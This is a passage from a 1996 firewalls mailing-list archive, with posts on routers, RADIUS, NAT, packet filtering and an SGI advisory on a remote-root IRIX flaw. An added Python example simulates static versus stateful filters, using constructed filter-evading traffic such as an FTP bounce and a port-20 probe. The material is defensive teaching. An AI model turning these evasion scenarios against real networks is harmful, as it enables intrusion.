Warmly, Padgett From firewalls-owner Wed Jan 3 07:07:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA29817 for firewalls-outgoing; Wed, 3 Jan 1996 06:13:04 -0800 (PST) Received: from hawk.tml.co.za (hawk.tml.co.za [196.4.87.22]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA29811 for ; Wed, 3 Jan 1996 06:12:45 -0800 (PST) Received: from gavin.tml.co.za (gavin.tml.co.za [196.4.87.114]) by hawk.tml.co.za (8.6.12/8.6.12) with SMTP id QAA11830 for ; Wed, 3 Jan 1996 16:12:14 -0200 Received: by gavin.tml.co.za with Microsoft Mail id <01BAD96C.4B588DE0@gavin.tml.co.za>; Tue, 2 Jan 1996 23:44:44 +-200 Message-ID: <01BAD96C.4B588DE0@gavin.tml.co.za> From: Gavin Ferreiro To: "'firewalls@GreatCircle.COM'" Subject: FW: ipx-bridging & ip-routing Date: Tue, 2 Jan 1996 23:44:38 +-200 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If speed is very important, seeing that you have 2 FDDI rings, the most efficient and effective way to route between the rings is with a Router. The speed obtained from a dedicated router as opposed to a router that has been made out of a HOST is astronomical. Rather use the correct equipment for the task. It will in my experience save you a lot of trouble in the end. ---------- From: Paul Ferguson[SMTP:pferguso@cisco.com] Sent: Wednesday, January 03, 1996 02:06 To: Shaw Innes Cc: Rabid Wombat; Pablo; firewalls@GreatCircle.COM Subject: Re: ipx-bridging & ip-routing Is there some reason why a router is not being considered? It would appear to be a natural choice... - paul At 09:00 PM 1/3/96 +1000, Shaw Innes wrote: >On Mon, 1 Jan 1996, Rabid Wombat wrote: > >> My guess is that the PC bus will be the bottleneck. I've ran PC servers on >> FDDI that had EISA bus (w/ EISA FDDI NICs) and couldn't get more than >> about 25 Mb/s stuffed into the box.
I haven't looked into this lately; >> PCI may have a higher raw capacity. If you are expecting to be using the >> FDDI to capacity you may be outa luck using a PC. >> >> Hope this is of some use. I'd be glad to hear from someone who's done >> this successfully. > >I don't really know an awful lot about fddi, but I could see that a PC >would cause a bottleneck at 100mb/s also. However, I have noticed that >there exists Linux for, mips, sparc and alpha architectures. Hence if >the PC was causing a bottleneck, surely you could buy a sun and run linux >on the sun, using the sun's faster bus to route/bridge the packets? > >Perhaps not... this is just a theory > >Regards, > Shaw > -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Wed Jan 3 07:28:04 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA00968 for firewalls-outgoing; Wed, 3 Jan 1996 07:14:16 -0800 (PST) Received: from sasami.jurai.net (sasami.jurai.net [205.218.122.51]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA00938 for ; Wed, 3 Jan 1996 07:14:09 -0800 (PST) From: scanner@jurai.net Received: (from scanner@localhost) by sasami.jurai.net (8.6.11/8.6.9) id JAA10585; Wed, 3 Jan 1996 09:14:29 -0600 Date: Wed, 3 Jan 1996 09:14:29 -0600 (CST) To: Rabid Wombat cc: firewalls@GreatCircle.COM Subject: Re: rfi Radius In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 2 Jan 1996, Rabid Wombat wrote: > > Is anyone out there using Radius w/ Portmasters? I'd be interested in > getting informed opinions, as I'm considering implementing it. Since it > uses encrypted sessions, can the system serving as a firewall also serve > as the Radius host, or is this opening a hole?
We are using radius on our Livingston. We just finished it and are working on getting our LAN online (new ISP). If you want I can send you some config files and the like that we use, just let me know. The encryption seems to be strong and hold its own, but I do suggest not using the database on the portmaster. I was informed it's not wise. But other than that it seems pretty good. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Chris Watson % Scanner@jurai.net % 1(908)367-8030 x126 % Networking & Computer Security Expert % Webspan Networking % Lakewood, NJ % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQENAzA7IoEAAAEH/2EPSOUsZ+hSxh3zGwtYvuaIjCzMU/TOz8z2RoKAubcJ+IlQ YVfG3RTiShlqsNnKSYKJbvOxF1OzkCicGl+XlodcWuXR3BmUrnpm45+oGIx6IUJ4 xkO6Ce7K5bT024jFkBXoL8csLdPmHDBlZtL4Y5uh8yXLMHSpJUMPT+hEGjuiFY48 E8Gox46Jti0oBxF9AtnZChsf1asMXrNiGgfRuWYgBjwB2lMW/co3XgvUw+JK2jSt MK3FhJSgSBpSeoq4K1pyEBboXXbV5/xD2rLgxJVBAxARpIDhaIQdOpRHENIGuwvl FhMzNOAqkJG6eAMJAdFMVXtgGvotuuEikpZD3oEABRG0IENocmlzIFdhdHNvbiA8 c2Nhbm5lckBqdXJhaS5uZXQ+ =yI5B -----END PGP PUBLIC KEY BLOCK----- From firewalls-owner Wed Jan 3 07:52:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA01563 for firewalls-outgoing; Wed, 3 Jan 1996 07:38:29 -0800 (PST) Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA01522 for ; Wed, 3 Jan 1996 07:38:19 -0800 (PST) Received: from nessie.mcc.ac.uk by relay2.UU.NET with ESMTP id QQzwxy12211; Wed, 3 Jan 1996 10:36:02 -0500 (EST) Received: from utserv.mcc.ac.uk by nessie.mcc.ac.uk with SMTP (PP); Wed, 3 Jan 1996 15:12:47 +0000 Received: from xen.mcc.ac.uk (actually xen-eth.mcc.ac.uk) by utserv.mcc.ac.uk with SMTP (PP); Wed, 3 Jan 1996 15:12:24 +0000 Date: Wed, 3 Jan 1996 15:12:19 +0000 (GMT) From: Patrick Myers To: Firewalls@GreatCircle.COM Subject: Network Address Translation In-Reply-To:
<199601022338.PAA06132@miles.greatcircle.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have a requirement for software to do NAT (Network Address Translation) where the ip addresses of systems on a local LAN are translated to different addresses on another interface (connected to the internet). I know that some firewall software has this facility, does anyone know of any other (non-firewall) software that will do this translation, preferably low cost (or free) and possibly to run on a Linux system? Thanks in advance -- Patrick Myers Manchester Computing | Email: p.j.myers@mcc.ac.uk University of Manchester | Tel: +44 (0)161 275 6016 Oxford Road | Mob: +44 (0)973 73 55 11 Manchester M13 9PL | Fax: +44 (0)161 275 6040 From firewalls-owner Wed Jan 3 08:07:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA01186 for firewalls-outgoing; Wed, 3 Jan 1996 07:24:36 -0800 (PST) Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA01181 for ; Wed, 3 Jan 1996 07:24:30 -0800 (PST) Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA13309; Wed, 3 Jan 96 09:25:55 CST Received: by mnbp.network.com with Microsoft Mail id <30EA9F55@mnbp.network.com>; Wed, 03 Jan 96 09:23:01 CST From: Craig McLellan To: firewalls Subject: RE: firewall encryption information Date: Wed, 03 Jan 96 09:22:00 CST Message-Id: <30EA9F55@mnbp.network.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You should also look at Network Systems Borderguard Access Router. Provides DES, 3xDES, IDEA and NSC1 as well as MD5 and Dif-Hell (sic). Costs start around 2.3K with one LAN and one WAN (V.35). 
RGRDS....clm ---------- From: firewalls-owner To: firewalls Subject: firewall encryption information Date: 2 January, 1996 17:18 A few questions about firewalls setting up virtual private networks. - for Gauntlet; what is the encryption algorithm used and what is the key size for session keys? - for Eagle; what is the key size used for DES encryption? - for Firewall-1; what is the key size used for DES encryption? -- chris From firewalls-owner Wed Jan 3 10:22:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA04716 for firewalls-outgoing; Wed, 3 Jan 1996 10:09:06 -0800 (PST) Received: from NUki (nuki.netuse.de [193.98.110.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA04705 for ; Wed, 3 Jan 1996 10:09:02 -0800 (PST) Received: by Mail.NetUSE.de (SMail3.1.28.1 #2) ID m0tXXg4-0009AaC: Wed, 3 Jan 96 19:12 MET Received: by white.schulung.netuse.de (Smail3.1.29.0 #2) id m0tXUWu-0008xkC; Wed, 3 Jan 96 15:51 MET Received: from GATEWAY by white.schulung.netuse.de with netnews for firewalls@greatcircle.com (firewalls@greatcircle.com) To: firewalls@greatcircle.com Date: Wed, 3 Jan 1996 14:45:33 GMT From: kris@schulung.netuse.de (Kristian Köhntopp) Message-ID: Organization: n/a (entfällt) References: <199601022338.PAA06132@miles.greatcircle.com> Subject: Re: Type enforcement vs chroot and buffers Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Firewalls@GreatCircle.COM writes: >That's not significantly better in terms of security, since it's all >or nothing. To be any use it'd have to be something like "/dev/tcp/25" >and so on... This would still be useless of course, unless you can do "chown mail /dev/tcp/25" and it actually changes permissions on this socket. This is trivial of course, but I mention it anyway because of the Linux procfs, which does not allow inode write access, thus giving you no advantage SUID-wise. Kristian -- Kristian Koehntopp, Wassilystrasse 30, 24113 Kiel, +49 431 688897 >>Soon AOL will have to block our FORKS too. They call that "Security by Obscenity".<< -- Peter Berlich in de.talk.bizarre From firewalls-owner Wed Jan 3 10:37:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA05349 for firewalls-outgoing; Wed, 3 Jan 1996 10:21:58 -0800 (PST) Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA05344 for ; Wed, 3 Jan 1996 10:21:53 -0800 (PST) Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id NAA04350; Wed, 3 Jan 1996 13:19:08 -0500 Date: Wed, 3 Jan 1996 13:19:05 -0500 (EST) From: Rabid Wombat To: Paul Ferguson cc: Shaw Innes , Pablo , firewalls@GreatCircle.COM Subject: Re: ipx-bridging & ip-routing In-Reply-To: <199601031205.EAA07234@lint.cisco.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm not sure what the requestor's requirements are; only that he asked if a PC running LINUX could route TCP/IP and bridge IPX between two FDDI rings. A router would seem to be the natural choice, although this _is_ the firewalls list, so he might have some additional concerns. ---------------------------------------- Rabid Wombat wombat@mcfeely.bsfs.org ---------------------------------------- On Wed, 3 Jan 1996, Paul Ferguson wrote: > Is there some reason why a router is not being considered? It would > appear to be a natural choice... > > - paul > > > At 09:00 PM 1/3/96 +1000, Shaw Innes wrote: > > >On Mon, 1 Jan 1996, Rabid Wombat wrote: > > > >> My guess is that the PC bus will be the bottleneck. I've ran PC servers on > >> FDDI that had EISA bus (w/ EISA FDDI NICs) and couldn't get more than > >> about 25 Mb/s stuffed into the box. I haven't looked into this lately; > >> PCI may have a higher raw capacity. If you are expecting to be using the > >> FDDI to capacity you may be outa luck using a PC. > >> > >> Hope this is of some use.
I'd be glad to hear from someone who's done > >> this successfully. > > > >I don't really know an awful lot about fddi, but I could see that a PC > >would cause a bottleneck at 100mb/s also. However, I have noticed that > >there exists Linux for, mips, sparc and alpha architectures. Hence if > >the PC was causing a bottleneck, surely you could buy a sun and run linux > >on the sun, using the sun's faster bus to route/bridge the packets? > > > >Perhaps not... this is just a theory > > > >Regards, > > Shaw > > > > -- > Paul Ferguson || || > Consulting Engineering || || > Reston, Virginia USA |||| |||| > tel: +1.703.716.9538 ..:||||||:..:||||||:.. > e-mail: pferguso@cisco.com c i s c o S y s t e m s > > From firewalls-owner Wed Jan 3 11:07:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA07315 for firewalls-outgoing; Wed, 3 Jan 1996 11:03:22 -0800 (PST) Received: from relay.ashton.csc.com (relay.ashton.csc.com [20.2.54.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA07286 for ; Wed, 3 Jan 1996 11:03:15 -0800 (PST) Received: by relay.ashton.csc.com; id OAA19023; Wed, 3 Jan 1996 14:02:26 -0500 Received: from mccoy.ashton.csc.com(20.2.51.2) by relay.ashton.csc.com via smap (g3.0.1) id sma019019; Wed, 3 Jan 96 14:01:59 -0500 Received: (from ckostick@localhost) by mccoy.ashton.csc.com (8.6.9/8.6.9) id OAA03467; Wed, 3 Jan 1996 14:15:16 -0500 From: Chris Kostick Message-Id: <199601031915.OAA03467@mccoy.ashton.csc.com> Subject: s/key digest algorithm on Firewall-1 To: firewalls@greatcircle.com, skey-users@thumper.bellcore.com Date: Wed, 3 Jan 1996 14:15:15 -0500 (EST) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone know the digest algorithm used with the S/Key implementation on Firewall-1? It doesn't seem to be MD4 or MD5. I have an s/key implementation for both and it never generates the same list as the one generated on Firewall-1.
-- Chris From firewalls-owner Wed Jan 3 11:22:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA07937 for firewalls-outgoing; Wed, 3 Jan 1996 11:15:23 -0800 (PST) Received: from relay.tis.com (relay.tis.com [192.94.214.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA07920 for ; Wed, 3 Jan 1996 11:15:18 -0800 (PST) Received: by relay.tis.com; id JAA11799; Wed, 3 Jan 1996 09:20:28 -0500 Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0.3) id xma011794; Wed, 3 Jan 96 09:20:27 -0500 Received: from jupiter.tis.com by tis.com (4.1/SUN-5.64) id AA08614; Wed, 3 Jan 96 14:12:40 EST Date: Wed, 3 Jan 96 14:12:40 EST From: Jody C Patilla Message-Id: <9601031912.AA08614@tis.com> To: firewalls@GreatCircle.COM Subject: Livingston Firewall IRX router Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does it use static or dynamic (or stateful, if you prefer) packet filtering? The product info is unclear on this point. I'd be interested in hearing any of your experiences with it, especially in connection with high-use Web servers on inside or outside segments. I'd also like to know more about how fine-grained the filtering is (and how easy to set up), say, compared with a Cisco. thanks - jcp ========================================================================= Jody C. Patilla jcp@tis.com Trusted Information Systems Glenwood, Md. 
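Jody's question turns on what "static" versus "dynamic (stateful)" filtering actually changes in the decisions a filter makes. The following is an added example written for this archive page, not code from Livingston, TIS or any poster: a small Python model of the two kinds of filter, fed the same constructed packet sequence. The static filter uses the two rules a static access list typically needs, "allow inbound UDP to port 53 or to any port above 1023" (the rule David Leonard asks about later in this digest) and "allow inbound TCP from source port 20 to ports above 1023" for active-mode FTP; the stateful one admits an inbound UDP packet only as the reply to a recorded outbound query, and an inbound FTP data connection only to the address and port the inside client itself announced in its PORT command, which also covers the FTP bounce case (a PORT naming a third host) that goes beyond the questions on the page. The internal network 10.1.1.0/24, all addresses and ports, and the 30-second UDP timeout are assumptions of the example.

```python
"""Static versus stateful packet filtering, run over constructed traffic.

Added example for this archive page; not code from any product or poster.
Internal network, addresses, ports and the UDP timeout are assumptions.
"""
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

@dataclass(frozen=True)
class Packet:
    proto: str         # "udp" or "tcp"
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool = False  # TCP connection request (matters for the FTP data channel)
    payload: str = ""  # only inspected on the FTP control channel

def inside(ip: str) -> bool:
    """Assumed internal network for the example: 10.1.1.0/24."""
    return ip.startswith("10.1.1.")

def outbound(p: Packet) -> bool:
    return inside(p.src) and not inside(p.dst)

def parse_port_command(line: str) -> Tuple[str, int]:
    """Decode 'PORT h1,h2,h3,h4,p1,p2' (RFC 959) into (host, port)."""
    nums = [int(x) for x in line[5:].strip().split(",")]
    if len(nums) != 6 or any(not 0 <= n <= 255 for n in nums):
        raise ValueError("malformed PORT command")
    return ".".join(map(str, nums[:4])), nums[4] * 256 + nums[5]

class StatelessFilter:
    """Static access list: every packet is judged on its own headers only."""

    def allow(self, p: Packet, now: float) -> bool:
        if outbound(p):
            return True                       # everything outbound is permitted
        if p.proto == "udp":                  # DNS replies, plus 'any UDP port above 1023'
            return p.dport == 53 or p.dport > 1023
        if p.proto == "tcp":                  # active-mode FTP data from server port 20
            return p.sport == 20 and p.dport > 1023
        return False

class StatefulFilter:
    """Dynamic filter: inbound traffic is admitted only when an earlier
    outbound packet created an expectation for exactly that flow."""
    UDP_TIMEOUT = 30.0  # seconds an outbound UDP query stays open for one reply

    def __init__(self) -> None:
        self.udp_pending: Dict[Tuple[str, int, str, int], float] = {}
        self.ftp_expected: Set[Tuple[str, str, int]] = set()  # (server, client, client port)

    def allow(self, p: Packet, now: float) -> bool:
        if outbound(p):
            if p.proto == "udp":
                self.udp_pending[(p.src, p.sport, p.dst, p.dport)] = now
            elif p.proto == "tcp" and p.dport == 21 and p.payload.startswith("PORT "):
                host, port = parse_port_command(p.payload)
                if host == p.src:             # never open a data channel to a third host
                    self.ftp_expected.add((p.dst, host, port))
            return True
        if p.proto == "udp":
            key = (p.dst, p.dport, p.src, p.sport)  # the outbound tuple, reversed
            sent = self.udp_pending.pop(key, None)  # one reply per query, then closed
            return sent is not None and now - sent <= self.UDP_TIMEOUT
        if p.proto == "tcp" and p.syn and p.sport == 20:
            key = (p.src, p.dst, p.dport)
            if key in self.ftp_expected:
                self.ftp_expected.discard(key)
                return True
        return False

def run_scenarios() -> Dict[str, Tuple[bool, bool]]:
    """Feed one constructed packet sequence through both filters and return,
    per step, (static decision, stateful decision)."""
    steps: List[Tuple[str, Packet, float]] = [
        ("dns query out", Packet("udp", "10.1.1.5", 4000, "192.0.2.1", 53), 0.0),
        ("dns reply in", Packet("udp", "192.0.2.1", 53, "10.1.1.5", 4000), 0.1),
        ("unsolicited udp to 2049", Packet("udp", "198.51.100.9", 5555, "10.1.1.5", 2049), 1.0),
        ("udp to portmapper 111", Packet("udp", "198.51.100.9", 5555, "10.1.1.5", 111), 1.0),
        ("ftp control out", Packet("tcp", "10.1.1.5", 3001, "192.0.2.7", 21, syn=True), 3.0),
        ("ftp PORT out", Packet("tcp", "10.1.1.5", 3001, "192.0.2.7", 21,
                                payload="PORT 10,1,1,5,11,186"), 3.1),
        ("ftp data in", Packet("tcp", "192.0.2.7", 20, "10.1.1.5", 3002, syn=True), 3.2),
        ("port-20 probe to 6000", Packet("tcp", "198.51.100.9", 20, "10.1.1.5", 6000, syn=True), 4.0),
        ("ftp bounce PORT out", Packet("tcp", "10.1.1.5", 3001, "192.0.2.7", 21,
                                       payload="PORT 10,1,1,9,11,187"), 5.0),
        ("bounce data in", Packet("tcp", "192.0.2.7", 20, "10.1.1.9", 3003, syn=True), 5.1),
        ("second dns query out", Packet("udp", "10.1.1.5", 4001, "192.0.2.1", 53), 6.0),
        ("late dns reply in", Packet("udp", "192.0.2.1", 53, "10.1.1.5", 4001), 40.0),
    ]
    static, dynamic = StatelessFilter(), StatefulFilter()
    return {name: (static.allow(p, t), dynamic.allow(p, t)) for name, p, t in steps}

if __name__ == "__main__":
    verdict = lambda b: "allow" if b else "deny"
    for name, (s, d) in run_scenarios().items():
        print(f"{name:26} static={verdict(s):6} stateful={verdict(d)}")
```

Running it prints one line per step. The static list passes the unsolicited UDP datagram to port 2049, the TCP probe from source port 20 to port 6000, the bounced FTP data connection, and a DNS "reply" arriving long after any query; the stateful filter rejects all four while still passing the real DNS reply and the real FTP data connection. That difference is the exposure behind the "UDP above 1023" request, and it is why Kron's two criteria (outbound-only UDP, outbound-only active FTP) cannot be met by a filter without state.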
From firewalls-owner Wed Jan 3 12:52:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA09673 for firewalls-outgoing; Wed, 3 Jan 1996 12:39:36 -0800 (PST) Received: from gateway.upj.com (gateway.upj.com [146.240.240.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA09661 for ; Wed, 3 Jan 1996 12:39:31 -0800 (PST) Received: from basil.upj.com by gateway.upj.com with SMTP id AA25440 (InterLock SMTP Gateway 3.0 for ); Wed, 3 Jan 1996 15:37:26 -0500 Received: by basil.upj.com (5.0/SMI-SVR4) id AA15160; Wed, 3 Jan 1996 15:31:46 +0500 Date: Wed, 3 Jan 1996 15:31:46 +0500 From: telomas@upj.com (Timothy E. Lomas ) Message-Id: <9601032031.AA15160@basil.upj.com> To: Firewalls@GreatCircle.com Subject: Firewalls in Many Countries X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The Pharmacia and Upjohn Companies merged last November. We are merging/changing the firewalls and Internet access points within the company. How do you do that and still give adequate service levels? We have queried our ISP and only received vague answers. It has been hard for me to find knowledgeable people within companies that understand firewalls, security issues and network issues. I am a strong proponent of local administration because I do not see how you can provide adequate response time to serious problems if the people that are supporting the firewall or if the vendor that supports the firewall is across the ocean. However, others within our new company think that centralization of firewall support and firewalls is critical. There is also a group that does not want to "pay" for the external IP traffic running across the internal network if adequate security can be provided by adding additional firewalls. KEY QUESTIONS: How many firewalls and Internet sites of access should we have and how should they be supported? Select and support one firewall vendor? Local versus remote administration?
Service Level: Respond to security problems immediately, and fix technical problems within 24 hours. Therefore, even mail could be down at a site for 24 hours although this seems like a long time to me. Management is very sensitive to the idea of the Internet and because of this, investigating unknown problems is a high priority. Users: We have a current or potential Internet user population of over 1000 users in Uppsala, Sweden; Milan, Italy; Kalamazoo, Michigan (USA); and Tsukuba, Japan. There are many other smaller sites that do (or will) receive Internet access by using the firewalls. Firewalls: We currently have two firewalls for Internet access: Kalamazoo (firewall is ANS Interlock - Solaris) Uppsala (firewall is Dec Seal). We will probably add a third in Japan shortly. Services allowed: Outbound FTP, TELNET, HTTP and of course smtp for mail. A few additional services are being piloted but have not yet been approved (WinCIM for Compuserve; SciFinder for access to an external database). Essentially anyone who has been given a TCP/IP address on an authorized network can obtain access to Internet services. TCP/IP addresses: We have one class B address and multiple class C's. From firewalls-owner Wed Jan 3 13:22:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA10594 for firewalls-outgoing; Wed, 3 Jan 1996 13:12:50 -0800 (PST) Received: from usagroup.com ([198.70.128.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA10589 for ; Wed, 3 Jan 1996 13:12:40 -0800 (PST) Received: from DOMAIN-E-Message_Server by usagroup.com with Novell_GroupWise; Wed, 03 Jan 1996 16:11:29 -0600 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Wed, 03 Jan 1996 16:14:41 -0600 From: David Leonard To: firewalls@greatcircle.com Subject: Router Config Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We are in the process of configuring our firewall and I have a question on the router access lists.
Currently, we do not allow UDP to pass through our router except for DNS traffic. However, we are experiencing denies when we change servers. Therefore, I have received a request to allow UDP for any port greater than 1023 to pass through our router. In addition, we have a Raptor Firewall between our internal network and the router in question. What, if any, are the exposures for allowing this type of traffic through our router? Any assistance will be greatly appreciated. I was also wondering if anyone could recommend a good book on router security. From firewalls-owner Wed Jan 3 13:37:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA10414 for firewalls-outgoing; Wed, 3 Jan 1996 13:11:17 -0800 (PST) Received: from uni.ins.com (uni.ins.com [199.0.193.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA10387 for ; Wed, 3 Jan 1996 13:11:02 -0800 (PST) Received: (from kron@localhost) by uni.ins.com (8.6.12/8.6.12) id NAA05372; Wed, 3 Jan 1996 13:10:08 -0800 From: Kenneth Kron Message-Id: <199601032110.NAA05372@uni.ins.com> Subject: Re: Livingston Firewall IRX router To: jcp@tis.com (Jody C Patilla) Date: Wed, 3 Jan 96 13:10:08 PST Cc: firewalls@GreatCircle.COM In-Reply-To: <9601031912.AA08614@tis.com>; from "Jody C Patilla" at Jan 3, 96 2:12 pm X-Mailer: ELM [version 2.3 PL6] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In the spirit of teaching you to fish... The way to answer this question for yourself is fairly simple. Does it allow you to open a hole for ... 1) outbound only UDP connections (DNS, NFS, etc.) UDP is connectionless so attempting to impose this requires statefulness. 2) outbound only non-passive ftp. FTP requires a back channel on a random port... 3) Does the marketing literature/documentation specifically state that it is stateful (or dynamic). The degree to which it performs 1 & 2 will give you your real answer; 3 is just a sanity check if you will.
If it's stateful at all it will probably be touted as such somewhere. For example one stateful product has a section called "Stateful Multi-Layer Inspection Technology". As far as the Livingston IRX router I really don't know as I haven't used it. =================== Kenneth Kron Information Security Consultant Kenneth_Kron@ins.com > > > Does it use static or dynamic (or stateful, if you prefer) packet filtering? > The product info is unclear on this point. I'd be interested in hearing > any of your experiences with it, especially in connection with high-use > Web servers on inside or outside segments. I'd also like to know more about > how fine-grained the filtering is (and how easy to set up), say, compared > with a Cisco. > > thanks - > > jcp > > ========================================================================= > Jody C. Patilla jcp@tis.com > Trusted Information Systems Glenwood, Md. > > From firewalls-owner Wed Jan 3 14:56:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA13048 for firewalls-outgoing; Wed, 3 Jan 1996 14:34:49 -0800 (PST) Received: from sgigate.sgi.com (sgigate.SGI.COM [204.94.209.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA12843 for ; Wed, 3 Jan 1996 14:33:38 -0800 (PST) Received: from sgihub.corp.sgi.com by sgigate.sgi.com via ESMTP (950911.SGI.8.6.12.PATCH825/940406.SGI) id OAA10084; Wed, 3 Jan 1996 14:32:51 -0800 Received: from rock.csd.sgi.com by sgihub.corp.sgi.com via ESMTP (950511.SGI.8.6.12.PATCH526/911001.SGI) id OAA25072; Wed, 3 Jan 1996 14:32:50 -0800 Received: from boytoy.csd.sgi.com by rock.csd.sgi.com via ESMTP (940816.SGI.8.6.9/910805.SGI) id OAA12979; Wed, 3 Jan 1996 14:32:48 -0800 Received: by boytoy.csd.sgi.com (950511.SGI.8.6.12.PATCH526/911001.SGI) id OAA03022; Wed, 3 Jan 1996 14:32:35 -0800 From: "SGI Security Coordinator" Message-Id: <9601031432.ZM3020@boytoy.csd.sgi.com> Date: Wed, 3 Jan 1996 14:32:32 -0800 X-Mailer: Z-Mail-SGI (3.2S.2
10apr95 MediaMail) To: agent99@sgihub.corp.sgi.com Subject: SGI Security Advisory 19960101-01-PX Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk FOR PUBLIC RELEASE -----BEGIN PGP SIGNED MESSAGE----- ________________________________________________________________________________ Silicon Graphics Inc. Security Advisory Title: Object Server Vulnerability Number: 19960101-01-PX Date: January 3, 1996 ________________________________________________________________________________ Silicon Graphics provides this information freely to the SGI community for its consideration, interpretation and implementation. Silicon Graphics recommends that this information be acted upon as soon as possible. Silicon Graphics will not be liable for any consequential damages arising from the use of, or failure to use or use properly, any of the instructions or information in this Security Advisory. ________________________________________________________________________________ As part of Silicon Graphics' continued security improvement efforts, Silicon Graphics has discovered a security vulnerability within the object server program used in the IRIX 5.x and IRIX 6.x operating systems. SGI has investigated this issue and recommends the following steps for neutralizing the exposure. It is HIGHLY RECOMMENDED that these measures be implemented on ALL SGI systems running IRIX 5.2, 5.3, 6.0, 6.0.1 and 6.1. This issue will be corrected in future releases of IRIX. -------------- --- Impact --- -------------- Provided with the correct network configuration and SGI environment, both local and remote users may be able to become root on a targeted SGI system. ---------------- --- Solution --- ---------------- The solution for this issue is a replacement of the object server program and assistant programs for those versions that are vulnerable.
The following patches have been generated for those versions vulnerable and are freely provided to the SGI community.

   **** IRIX 3.x ****

This version of IRIX is not vulnerable. No action is required.

   **** IRIX 4.x ****

This version of IRIX is not vulnerable. No action is required.

   **** IRIX 5.0.x, 5.1.x ****

For the IRIX operating systems versions 5.0.x, 5.1.x, an upgrade to 5.2 or better is required first. When the upgrade is completed, then the patches described in the next sections "**** IRIX 5.2, 6.0, 6.0.1 ****" or "**** IRIX 5.3 ****" or "**** IRIX 6.1 ****" can be applied depending on the final version of upgrade.

   **** IRIX 5.2, 6.0, 6.0.1 ****

For the IRIX operating system versions 5.2, 6.0, and 6.0.1, an inst-able patch has been generated and made available via anonymous ftp and/or your service/support provider. The patch is number 1052 and will only install on IRIX versions 5.2, 6.0, and 6.0.1.

The SGI anonymous ftp site is sgigate.sgi.com (204.94.209.1). Patch 1052 can be found in the following directories on the ftp server:

        ~ftp/Security

        or

        ~ftp/Patches/5.2
        ~ftp/Patches/6.0
        ~ftp/Patches/6.0.1

   ##### Checksums ####

The actual patch will be a tar file containing the following files:

        README.patch.1052
        patchSG0001052
        patchSG0001052.cadmin_sw
        patchSG0001052.idb

   **** IRIX 5.3 ****

For the 5.3 IRIX operating system, an inst-able patch has been generated and made available via anonymous ftp and/or your service/support provider. The patch is number 1048 and will only install on IRIX 5.3.

